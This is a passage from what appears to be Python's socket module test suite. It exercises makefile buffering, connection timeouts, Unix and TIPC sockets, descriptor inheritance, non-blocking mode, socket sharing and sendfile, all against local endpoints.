self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
